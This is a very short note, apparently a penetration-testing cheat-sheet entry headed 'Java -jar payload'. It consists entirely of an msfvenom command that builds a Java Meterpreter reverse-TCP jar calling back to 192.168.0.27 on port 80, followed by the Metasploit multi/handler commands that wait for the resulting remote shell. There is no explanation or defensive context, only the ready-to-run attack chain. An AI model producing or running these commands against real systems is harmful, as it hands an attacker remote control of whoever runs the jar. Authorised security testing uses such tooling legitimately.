control – Java -jar payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.27 LPORT=80 -f raw -o /tmp/java6.jar  use exploit/multi/handler set payload java/meterpreter/reverse_tcp set lhost 192.168.0.27 set lport 80 exploit -j